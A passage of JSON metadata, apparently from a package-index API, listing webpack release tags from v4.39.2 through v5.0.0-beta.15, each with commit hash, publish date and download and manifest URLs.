e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed